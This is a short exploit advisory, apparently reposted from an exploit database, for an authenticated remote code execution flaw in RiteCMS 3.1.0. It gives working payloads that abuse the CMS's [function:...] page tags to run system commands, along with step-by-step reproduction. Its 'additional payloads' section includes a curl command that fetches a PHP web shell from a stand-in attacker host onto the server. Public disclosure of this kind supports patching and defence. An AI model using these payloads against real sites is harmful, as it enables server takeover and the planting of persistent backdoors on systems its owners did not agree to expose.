Share
## https://sploitus.com/exploit?id=PACKETSTORM:210932
# Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution (RCE)
    # Date: 2025-10-26
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/handylulu/RiteCMS
    # Software Link:
    https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
    # Version: 3.1.0
    # Tested on: Windows XP
    
    
    ## Vulnerability Description
    RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via
    its content_function() handler: [function:...] tags in page content are
    evaluated, allowing a user with page-editing privileges to execute
    arbitrary PHP on the server.
    
    ## Exploit Code
    Create or edit any page with the following content:
    
    [function:system('whoami')]
    
    
    ## Steps to Reproduce
    1. Login as administrator
    2. Create new page or edit existing page
    3. Insert [function:system('whoami')] in content
    4. Save and view page
    5. Command output will be displayed
    
    ## additional payloads
    [function:system('curl http://attacker/shell.php -o shell.php')]
    [function:system('id')]